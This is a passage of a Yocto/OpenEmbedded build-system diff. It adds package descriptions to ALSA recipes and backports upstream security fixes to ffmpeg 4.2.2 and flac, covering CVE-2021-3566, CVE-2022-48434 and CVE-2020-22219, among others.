install -m 0644 -D regulatory.db ${D}${nonarch_base_libdir}/firmware/regulatory.db
install -m 0644 regulatory.db.p7s ${D}${nonarch_base_libdir}/firmware/regulatory.db.p7s
diff --git a/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb b/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
index e2bc61fbe9..4867c798b9 100644
--- a/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
+++ b/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
@@ -1,4 +1,6 @@
SUMMARY = "ALSA sound library"
+DESCRIPTION = "(Occasionally a.k.a. libasound) is a userspace library that \
+provides a level of abstraction over the /dev interfaces provided by the kernel modules."
HOMEPAGE = "http://www.alsa-project.org"
BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
SECTION = "libs/multimedia"
diff --git a/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
index 61d394b0f0..8205982fcc 100644
--- a/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
@@ -1,4 +1,7 @@
SUMMARY = "ALSA Plugins"
+DESCRIPTION = "Used to create virtual devices that can be used like normal \
+hardware devices but cause extra processing of the sound stream to take place. \
+They are used while configuring ALSA in the .asoundrc file."
HOMEPAGE = "http://alsa-project.org"
BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
SECTION = "multimedia"
@@ -33,7 +36,7 @@ PACKAGECONFIG ??= "\
speexdsp \
${@bb.utils.filter('DISTRO_FEATURES', 'pulseaudio', d)} \
"
-PACKAGECONFIG[aaf] = "--enable-aaf,--disable-aaf,avtp"
+PACKAGECONFIG[aaf] = "--enable-aaf,--disable-aaf,libavtp"
PACKAGECONFIG[jack] = "--enable-jack,--disable-jack,jack"
PACKAGECONFIG[libav] = "--enable-libav,--disable-libav,libav"
PACKAGECONFIG[maemo-plugin] = "--enable-maemo-plugin,--disable-maemo-plugin"
diff --git a/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb b/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
index c1f4acdb03..c979d7642e 100644
--- a/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
+++ b/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
@@ -1,4 +1,7 @@
SUMMARY = "Advanced tools for certain ALSA sound card drivers"
+DESCRIPTION = "Package containing a number of tools ranging from envy24control \
+which provides complete control over all devices with an envy24 chip, to \
+firmware loaders for pcmcia, USB and the hdsp devices."
HOMEPAGE = "http://www.alsa-project.org"
BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
SECTION = "console/utils"
diff --git a/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
index 5101cc7b7a..2ff5494c99 100644
--- a/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
@@ -1,4 +1,7 @@
SUMMARY = "ALSA topology configuration files"
+DESCRIPTION = "Provides a method for audio drivers to load their mixers, \
+routing, PCMs and capabilities from user space at runtime without changing \
+any driver source code."
HOMEPAGE = "https://alsa-project.org"
BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking"
LICENSE = "BSD-3-Clause"
diff --git a/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb b/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
index a432d5de07..ee1688b421 100644
--- a/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
+++ b/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
@@ -1,4 +1,7 @@
SUMMARY = "ALSA Use Case Manager configuration"
+DESCRIPTION = "This package contains ALSA Use Case Manager configuration \
+of audio input/output names and routing for specific audio hardware. \
+They can be used with the alsaucm tool. "
HOMEPAGE = "https://alsa-project.org"
BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking"
LICENSE = "BSD-3-Clause"
diff --git a/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb b/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
index 1dc30f377b..54aa2f9544 100644
--- a/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
@@ -1,4 +1,6 @@
SUMMARY = "ALSA sound utilities"
+DESCRIPTION = "collection of small and often extremely powerful applications \
+designed to allow users to control the various parts of the ALSA system."
HOMEPAGE = "http://www.alsa-project.org"
BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
SECTION = "console/utils"
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch
new file mode 100644
index 0000000000..3b503c49c9
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch
@@ -0,0 +1,97 @@
+From 24a58d70cbb3997e471366bd5afe54be9007bfb1 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 15:32:14 +0000
+Subject: [PATCH] libavutil: include assembly with full path from source root
+
+Otherwise nasm writes the full host-specific paths into .o
+output, which breaks binary reproducibility.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ libavutil/x86/cpuid.asm | 2 +-
+ libavutil/x86/emms.asm | 2 +-
+ libavutil/x86/fixed_dsp.asm | 2 +-
+ libavutil/x86/float_dsp.asm | 2 +-
+ libavutil/x86/lls.asm | 2 +-
+ libavutil/x86/pixelutils.asm | 2 +-
+ 6 files changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/libavutil/x86/cpuid.asm b/libavutil/x86/cpuid.asm
+index c3f7866..766f77f 100644
+--- a/libavutil/x86/cpuid.asm
++++ b/libavutil/x86/cpuid.asm
+@@ -21,7 +21,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
+diff --git a/libavutil/x86/emms.asm b/libavutil/x86/emms.asm
+index 8611762..df84f22 100644
+--- a/libavutil/x86/emms.asm
++++ b/libavutil/x86/emms.asm
+@@ -18,7 +18,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
+diff --git a/libavutil/x86/fixed_dsp.asm b/libavutil/x86/fixed_dsp.asm
+index 979dd5c..2f41185 100644
+--- a/libavutil/x86/fixed_dsp.asm
++++ b/libavutil/x86/fixed_dsp.asm
+@@ -20,7 +20,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
+diff --git a/libavutil/x86/float_dsp.asm b/libavutil/x86/float_dsp.asm
+index 517fd63..b773e61 100644
+--- a/libavutil/x86/float_dsp.asm
++++ b/libavutil/x86/float_dsp.asm
+@@ -20,7 +20,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION_RODATA 32
+ pd_reverse: dd 7, 6, 5, 4, 3, 2, 1, 0
+diff --git a/libavutil/x86/lls.asm b/libavutil/x86/lls.asm
+index 317fba6..d2526d1 100644
+--- a/libavutil/x86/lls.asm
++++ b/libavutil/x86/lls.asm
+@@ -20,7 +20,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
+diff --git a/libavutil/x86/pixelutils.asm b/libavutil/x86/pixelutils.asm
+index 36c57c5..8b45ead 100644
+--- a/libavutil/x86/pixelutils.asm
++++ b/libavutil/x86/pixelutils.asm
+@@ -21,7 +21,7 @@
+ ;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ ;******************************************************************************
+
+-%include "x86util.asm"
++%include "libavutil/x86/x86util.asm"
+
+ SECTION .text
+
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch
new file mode 100644
index 0000000000..abfc024820
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch
@@ -0,0 +1,61 @@
+From 3bce9e9b3ea35c54bacccc793d7da99ea5157532 Mon Sep 17 00:00:00 2001
+From: Paul B Mahol <onemda@gmail.com>
+Date: Mon, 27 Jan 2020 21:53:08 +0100
+Subject: [PATCH] avformat/tty: add probe function
+
+CVE: CVE-2021-3566
+Signed-off-by: Saloni Jain <salonij@kpit.com>
+
+Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=3bce9e9b3ea35c54bacccc793d7da99ea5157532]
+Comment: No changes/refreshing done.
+---
+ libavformat/tty.c | 21 ++++++++++++++++++++-
+ 1 file changed, 20 insertions(+), 1 deletion(-)
+
+diff --git a/libavformat/tty.c b/libavformat/tty.c
+index 8d48f2c45c12..60f7e9f87ee7 100644
+--- a/libavformat/tty.c
++++ b/libavformat/tty.c
+@@ -34,6 +34,13 @@
+ #include "internal.h"
+ #include "sauce.h"
+
++static int isansicode(int x)
++{
++ return x == 0x1B || x == 0x0A || x == 0x0D || (x >= 0x20 && x < 0x7f);
++}
++
++static const char tty_extensions[31] = "ans,art,asc,diz,ice,nfo,txt,vt";
++
+ typedef struct TtyDemuxContext {
+ AVClass *class;
+ int chars_per_frame;
+@@ -42,6 +49,17 @@ typedef struct TtyDemuxContext {
+ AVRational framerate; /**< Set by a private option. */
+ } TtyDemuxContext;
+
++static int read_probe(const AVProbeData *p)
++{
++ int cnt = 0;
++
++ for (int i = 0; i < p->buf_size; i++)
++ cnt += !!isansicode(p->buf[i]);
++
++ return (cnt * 100LL / p->buf_size) * (cnt > 400) *
++ !!av_match_ext(p->filename, tty_extensions);
++}
++
+ /**
+ * Parse EFI header
+ */
+@@ -153,8 +171,9 @@ AVInputFormat ff_tty_demuxer = {
+ .name = "tty",
+ .long_name = NULL_IF_CONFIG_SMALL("Tele-typewriter"),
+ .priv_data_size = sizeof(TtyDemuxContext),
++ .read_probe = read_probe,
+ .read_header = read_header,
+ .read_packet = read_packet,
+- .extensions = "ans,art,asc,diz,ice,nfo,txt,vt",
++ .extensions = tty_extensions,
+ .priv_class = &tty_demuxer_class,
+ };
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
new file mode 100644
index 0000000000..e5be985fc3
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
@@ -0,0 +1,53 @@
+From e01d306c647b5827102260b885faa223b646d2d1 Mon Sep 17 00:00:00 2001
+From: James Almer <jamrial@gmail.com>
+Date: Wed, 21 Jul 2021 01:02:44 -0300
+Subject: [PATCH] avcodec/utils: don't return negative values in
+ av_get_audio_frame_duration()
+
+In some extreme cases, like with adpcm_ms samples with an extremely high channel
+count, get_audio_frame_duration() may return a negative frame duration value.
+Don't propagate it, and instead return 0, signaling that a duration could not
+be determined.
+
+CVE: CVE-2021-38291
+Fixes ticket #9312
+Signed-off-by: James Almer <jamrial@gmail.com>
+Signed-off-by: Saloni Jain <salonij@kpit.com>
+
+Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=e01d306c647b5827102260b885faa223b646d2d1]
+Comment: No changes/refreshing done.
+---
+ libavcodec/utils.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/libavcodec/utils.c b/libavcodec/utils.c
+index 5fad782f5a..cfc07cbcb8 100644
+--- a/libavcodec/utils.c
++++ b/libavcodec/utils.c
+@@ -810,20 +810,22 @@ static int get_audio_frame_duration(enum AVCodecID id, int sr, int ch, int ba,
+
+ int av_get_audio_frame_duration(AVCodecContext *avctx, int frame_bytes)
+ {
+- return get_audio_frame_duration(avctx->codec_id, avctx->sample_rate,
++ int duration = get_audio_frame_duration(avctx->codec_id, avctx->sample_rate,
+ avctx->channels, avctx->block_align,
+ avctx->codec_tag, avctx->bits_per_coded_sample,
+ avctx->bit_rate, avctx->extradata, avctx->frame_size,
+ frame_bytes);
++ return FFMAX(0, duration);
+ }
+
+ int av_get_audio_frame_duration2(AVCodecParameters *par, int frame_bytes)
+ {
+- return get_audio_frame_duration(par->codec_id, par->sample_rate,
++ int duration = get_audio_frame_duration(par->codec_id, par->sample_rate,
+ par->channels, par->block_align,
+ par->codec_tag, par->bits_per_coded_sample,
+ par->bit_rate, par->extradata, par->frame_size,
+ frame_bytes);
++ return FFMAX(0, duration);
+ }
+
+ #if !HAVE_THREADS
+--
+2.20.1
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch
new file mode 100644
index 0000000000..bd8a08a216
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch
@@ -0,0 +1,36 @@
+From: Michael Niedermayer <michael@niedermayer.cc>
+Date: Sun, 27 Feb 2022 14:43:04 +0100
+Subject: [PATCH] avcodec/g729_parser: Check channels
+
+Fixes: signed integer overflow: 10 * 808464428 cannot be represented in type 'int'
+Fixes: assertion failure
+Fixes: ticket9651
+
+Reviewed-by: Paul B Mahol <onemda@gmail.com>
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+(cherry picked from commit 757da974b21833529cc41bdcc9684c29660cdfa8)
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+
+CVE: CVE-2022-1475
+Upstream-Status: Backport [https://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=e9e2ddbc6c78cc18b76093617f82c920e58a8d1f]
+Comment: Patch is refreshed as per ffmpeg codebase
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+---
+ libavcodec/g729_parser.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+Index: ffmpeg-4.2.2/libavcodec/g729_parser.c
+===================================================================
+--- a/libavcodec/g729_parser.c
++++ b/libavcodec/g729_parser.c
+@@ -48,6 +48,9 @@ static int g729_parse(AVCodecParserConte
+ av_assert1(avctx->codec_id == AV_CODEC_ID_G729);
+ /* FIXME: replace this heuristic block_size with more precise estimate */
+ s->block_size = (avctx->bit_rate < 8000) ? G729D_6K4_BLOCK_SIZE : G729_8K_BLOCK_SIZE;
++ // channels > 2 is invalid, we pass the packet on unchanged
++ if (avctx->channels > 2)
++ s->block_size = 0;
+ s->block_size *= avctx->channels;
+ s->duration = avctx->frame_size;
+ }
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch
new file mode 100644
index 0000000000..febf49cff2
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch
@@ -0,0 +1,41 @@
+From 656cb0450aeb73b25d7d26980af342b37ac4c568 Mon Sep 17 00:00:00 2001
+From: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Date: Tue, 15 Feb 2022 17:58:08 +0800
+Subject: [PATCH] avcodec/vp3: Add missing check for av_malloc
+
+Since av_malloc() may fail and return a NULL pointer,
+'s->edge_emu_buffer' should be checked to make sure the new
+allocation succeeded.
+
+Fixes: d14723861b ("VP3: fix decoding of videos with stride > 2048")
+
+CVE: CVE-2022-3109
+Upstream-Status: Backport [https://github.com/FFmpeg/FFmpeg/commit/656cb0450aeb73b25d7d26980af342b37ac4c568]
+Comments: Refreshed hunk
+
+Reviewed-by: Peter Ross <pross@xvid.org>
+Signed-off-by: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ libavcodec/vp3.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/libavcodec/vp3.c b/libavcodec/vp3.c
+index e9ab54d73677..e2418eb6fa04 100644
+--- a/libavcodec/vp3.c
++++ b/libavcodec/vp3.c
+@@ -2740,8 +2740,13 @@
+ if (ff_thread_get_buffer(avctx, &s->current_frame, AV_GET_BUFFER_FLAG_REF) < 0)
+ goto error;
+
+- if (!s->edge_emu_buffer)
++ if (!s->edge_emu_buffer) {
+ s->edge_emu_buffer = av_malloc(9 * FFABS(s->current_frame.f->linesize[0]));
++ if (!s->edge_emu_buffer) {
++ ret = AVERROR(ENOMEM);
++ goto error;
++ }
++ }
+
+ if (s->keyframe) {
+ if (!s->theora) {
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch
new file mode 100644
index 0000000000..fcbd9b3e1b
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch
@@ -0,0 +1,67 @@
+From 9cf652cef49d74afe3d454f27d49eb1a1394951e Mon Sep 17 00:00:00 2001
+From: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Date: Wed, 23 Feb 2022 10:31:59 +0800
+Subject: [PATCH] avformat/nutdec: Add check for avformat_new_stream
+
+Check for failure of avformat_new_stream() and propagate
+the error code.
+
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+
+CVE: CVE-2022-3341
+
+Upstream-Status: Backport [https://github.com/FFmpeg/FFmpeg/commit/9cf652cef49d74afe3d454f27d49eb1a1394951e]
+
+Comments: Refreshed Hunk
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ libavformat/nutdec.c | 16 ++++++++++++----
+ 1 file changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/libavformat/nutdec.c b/libavformat/nutdec.c
+index 0a8a700acf..f9ad2c0af1 100644
+--- a/libavformat/nutdec.c
++++ b/libavformat/nutdec.c
+@@ -351,8 +351,12 @@ static int decode_main_header(NUTContext *nut)
+ ret = AVERROR(ENOMEM);
+ goto fail;
+ }
+- for (i = 0; i < stream_count; i++)
+- avformat_new_stream(s, NULL);
++ for (i = 0; i < stream_count; i++) {
++ if (!avformat_new_stream(s, NULL)) {
++ ret = AVERROR(ENOMEM);
++ goto fail;
++ }
++ }
+
+ return 0;
+ fail:
+@@ -793,19 +793,23 @@
+ NUTContext *nut = s->priv_data;
+ AVIOContext *bc = s->pb;
+ int64_t pos;
+- int initialized_stream_count;
++ int initialized_stream_count, ret;
+
+ nut->avf = s;
+
+ /* main header */
+ pos = 0;
++ ret = 0;
+ do {
++ if (ret == AVERROR(ENOMEM))
++ return ret;
++
+ pos = find_startcode(bc, MAIN_STARTCODE, pos) + 1;
+ if (pos < 0 + 1) {
+ av_log(s, AV_LOG_ERROR, "No main startcode found.\n");
+ goto fail;
+ }
+- } while (decode_main_header(nut) < 0);
++ } while ((ret = decode_main_header(nut)) < 0);
+
+ /* stream headers */
+ pos = 0;
+
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch
new file mode 100644
index 0000000000..707073709a
--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch
@@ -0,0 +1,136 @@
+From d4b7b3c03ee2baf0166ce49dff17ec9beff684db Mon Sep 17 00:00:00 2001
+From: Anton Khirnov <anton@khirnov.net>
+Date: Fri, 2 Sep 2022 22:21:27 +0200
+Subject: [PATCH] lavc/pthread_frame: avoid leaving stale hwaccel state in
+ worker threads
+
+This state is not refcounted, so make sure it always has a well-defined
+owner.
+
+Remove the block added in 091341f2ab5bd35ca1a2aae90503adc74f8d3523, as
+this commit also solves that issue in a more general way.
+
+(cherry picked from commit cc867f2c09d2b69cee8a0eccd62aff002cbbfe11)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+(cherry picked from commit 35aa7e70e7ec350319e7634a30d8d8aa1e6ecdda)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+(cherry picked from commit 3bc28e9d1ab33627cea3c632dd6b0c33e22e93ba)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+
+CVE: CVE-2022-48434
+Upstream-Status: Backport [https://git.ffmpeg.org/gitweb/ffmpeg.git/commit/d4b7b3c03ee2baf0166ce49dff17ec9beff684db]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: Hunk#6 refreshed to backport changes and others to remove patch-fuzz warnings
+---
+ libavcodec/pthread_frame.c | 46 +++++++++++++++++++++++++++++---------
+ 1 file changed, 35 insertions(+), 11 deletions(-)
+
+diff --git a/libavcodec/pthread_frame.c b/libavcodec/pthread_frame.c
+index 36ac0ac..bbc5ba6 100644
+--- a/libavcodec/pthread_frame.c
++++ b/libavcodec/pthread_frame.c
+@@ -135,6 +135,12 @@ typedef struct FrameThreadContext {
+ * Set for the first N packets, where N is the number of threads.
+ * While it is set, ff_thread_en/decode_frame won't return any results.
+ */
++
++ /* hwaccel state is temporarily stored here in order to transfer its ownership
++ * to the next decoding thread without the need for extra synchronization */
++ const AVHWAccel *stash_hwaccel;
++ void *stash_hwaccel_context;
++ void *stash_hwaccel_priv;
+ } FrameThreadContext;
+
+ #define THREAD_SAFE_CALLBACKS(avctx) \
+@@ -211,9 +217,17 @@ static attribute_align_arg void *frame_worker_thread(void *arg)
+ ff_thread_finish_setup(avctx);
+
+ if (p->hwaccel_serializing) {
++ /* wipe hwaccel state to avoid stale pointers lying around;
++ * the state was transferred to FrameThreadContext in
++ * ff_thread_finish_setup(), so nothing is leaked */
++ avctx->hwaccel = NULL;
++ avctx->hwaccel_context = NULL;
++ avctx->internal->hwaccel_priv_data = NULL;
++
+ p->hwaccel_serializing = 0;
+ pthread_mutex_unlock(&p->parent->hwaccel_mutex);
+ }
++ av_assert0(!avctx->hwaccel);
+
+ if (p->async_serializing) {
+ p->async_serializing = 0;
+@@ -275,14 +289,10 @@ static int update_context_from_thread(AVCodecContext *dst, AVCodecContext *src,
+ dst->color_range = src->color_range;
+ dst->chroma_sample_location = src->chroma_sample_location;
+
+- dst->hwaccel = src->hwaccel;
+- dst->hwaccel_context = src->hwaccel_context;
+-
+ dst->channels = src->channels;
+ dst->sample_rate = src->sample_rate;
+ dst->sample_fmt = src->sample_fmt;
+ dst->channel_layout = src->channel_layout;
+- dst->internal->hwaccel_priv_data = src->internal->hwaccel_priv_data;
+
+ if (!!dst->hw_frames_ctx != !!src->hw_frames_ctx ||
+ (dst->hw_frames_ctx && dst->hw_frames_ctx->data != src->hw_frames_ctx->data)) {
+@@ -415,6 +425,12 @@ static int submit_packet(PerThreadContext *p, AVCodecContext *user_avctx,
+ pthread_mutex_unlock(&p->mutex);
+ return err;
+ }
++
++ /* transfer hwaccel state stashed from previous thread, if any */
++ av_assert0(!p->avctx->hwaccel);
++ FFSWAP(const AVHWAccel*, p->avctx->hwaccel, fctx->stash_hwaccel);
++ FFSWAP(void*, p->avctx->hwaccel_context, fctx->stash_hwaccel_context);
++ FFSWAP(void*, p->avctx->internal->hwaccel_priv_data, fctx->stash_hwaccel_priv);
+ }
+
+ av_packet_unref(&p->avpkt);
+@@ -616,6 +632,14 @@ void ff_thread_finish_setup(AVCodecContext *avctx) {
+ async_lock(p->parent);
+ }
+
++ /* save hwaccel state for passing to the next thread;
++ * this is done here so that this worker thread can wipe its own hwaccel
++ * state after decoding, without requiring synchronization */
++ av_assert0(!p->parent->stash_hwaccel);
++ p->parent->stash_hwaccel = avctx->hwaccel;
++ p->parent->stash_hwaccel_context = avctx->hwaccel_context;
++ p->parent->stash_hwaccel_priv = avctx->internal->hwaccel_priv_data;
++
+ pthread_mutex_lock(&p->progress_mutex);
+ if(atomic_load(&p->state) == STATE_SETUP_FINISHED){
+ av_log(avctx, AV_LOG_WARNING, "Multiple ff_thread_finish_setup() calls\n");
+@@ -657,13 +681,6 @@ void ff_frame_thread_free(AVCodecContext *avctx, int thread_count)
+
+ park_frame_worker_threads(fctx, thread_count);
+
+- if (fctx->prev_thread && fctx->prev_thread != fctx->threads)
+- if (update_context_from_thread(fctx->threads->avctx, fctx->prev_thread->avctx, 0) < 0) {
+- av_log(avctx, AV_LOG_ERROR, "Final thread update failed\n");
+- fctx->prev_thread->avctx->internal->is_copy = fctx->threads->avctx->internal->is_copy;
+- fctx->threads->avctx->internal->is_copy = 1;
+- }
+-
+ for (i = 0; i < thread_count; i++) {
+ PerThreadContext *p = &fctx->threads[i];
+
+@@ -713,6 +730,13 @@ void ff_frame_thread_free(AVCodecContext *avctx, int thread_count)
+ pthread_mutex_destroy(&fctx->async_mutex);
+ pthread_cond_destroy(&fctx->async_cond);
+
++ /* if we have stashed hwaccel state, move it to the user-facing context,
++ * so it will be freed in avcodec_close() */
++ av_assert0(!avctx->hwaccel);
++ FFSWAP(const AVHWAccel*, avctx->hwaccel, fctx->stash_hwaccel);
++ FFSWAP(void*, avctx->hwaccel_context, fctx->stash_hwaccel_context);
++ FFSWAP(void*, avctx->internal->hwaccel_priv_data, fctx->stash_hwaccel_priv);
++
+ av_freep(&avctx->internal->thread_ctx);
+
+ if (avctx->priv_data && avctx->codec && avctx->codec->priv_class)
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
index fddfef9e27..f12052548f 100644
--- a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
@@ -26,7 +26,14 @@ LIC_FILES_CHKSUM = "file://COPYING.GPLv2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
SRC_URI = "https://www.ffmpeg.org/releases/${BP}.tar.xz \
file://mips64_cpu_detection.patch \
file://CVE-2020-12284.patch \
- "
+ file://0001-libavutil-include-assembly-with-full-path-from-sourc.patch \
+ file://CVE-2021-3566.patch \
+ file://CVE-2021-38291.patch \
+ file://CVE-2022-1475.patch \
+ file://CVE-2022-3109.patch \
+ file://CVE-2022-3341.patch \
+ file://CVE-2022-48434.patch \
+ "
SRC_URI[md5sum] = "348956fc2faa57a2f79bbb84ded9fbc3"
SRC_URI[sha256sum] = "cb754255ab0ee2ea5f66f8850e1bd6ad5cac1cd855d0a2f4990fb8c668b0d29c"
@@ -129,6 +136,11 @@ do_configure() {
${S}/configure ${EXTRA_OECONF}
}
+# patch out build host paths for reproducibility
+do_compile_prepend_class-target() {
+ sed -i -e "s,${WORKDIR},,g" ${B}/config.h
+}
+
PACKAGES =+ "libavcodec \
libavdevice \
libavfilter \
diff --git a/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch b/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch
new file mode 100644
index 0000000000..e042872dc0
--- /dev/null
+++ b/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch
@@ -0,0 +1,197 @@
+From 579ff6922089cbbbd179619e40e622e279bd719f Mon Sep 17 00:00:00 2001
+From: Martijn van Beurden <mvanb1@gmail.com>
+Date: Wed, 3 Aug 2022 13:52:19 +0200
+Subject: [PATCH] flac: Add and use _nofree variants of safe_realloc functions
+
+Parts of the code use realloc like
+
+x = safe_realloc(x, somesize);
+
+when this is the case, the safe_realloc variant used must free the
+old memory block in case it fails, otherwise it will leak. However,
+there are also instances in the code where handling is different:
+
+if (0 == (x = safe_realloc(y, somesize)))
+ return false
+
+in this case, y should not be freed; since y is not set to NULL,
+freeing it inside the helper could lead to double frees later. Here
+the safe_realloc_nofree functions are used.
+
+Upstream-Status: Backport [https://github.com/xiph/flac/commit/21fe95ee828b0b9b944f6aa0bb02d24fbb981815]
+CVE: CVE-2020-22219
+
+Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com>
+---
+ include/share/alloc.h | 41 +++++++++++++++++++++++++++++++----
+ src/flac/encode.c | 4 ++--
+ src/flac/foreign_metadata.c | 2 +-
+ src/libFLAC/bitwriter.c | 2 +-
+ src/libFLAC/metadata_object.c | 2 +-
+ src/plugin_common/tags.c | 2 +-
+ src/share/utf8/iconvert.c | 2 +-
+ 7 files changed, 44 insertions(+), 11 deletions(-)
+
+diff --git a/include/share/alloc.h b/include/share/alloc.h
+index 914de9b..55bdd1d 100644
+--- a/include/share/alloc.h
++++ b/include/share/alloc.h
+@@ -161,17 +161,30 @@ static inline void *safe_realloc_(void *ptr, size_t size)
+ free(oldptr);
+ return newptr;
+ }
+-static inline void *safe_realloc_add_2op_(void *ptr, size_t size1, size_t size2)
++static inline void *safe_realloc_nofree_add_2op_(void *ptr, size_t size1, size_t size2)
++{
++ size2 += size1;
++ if(size2 < size1)
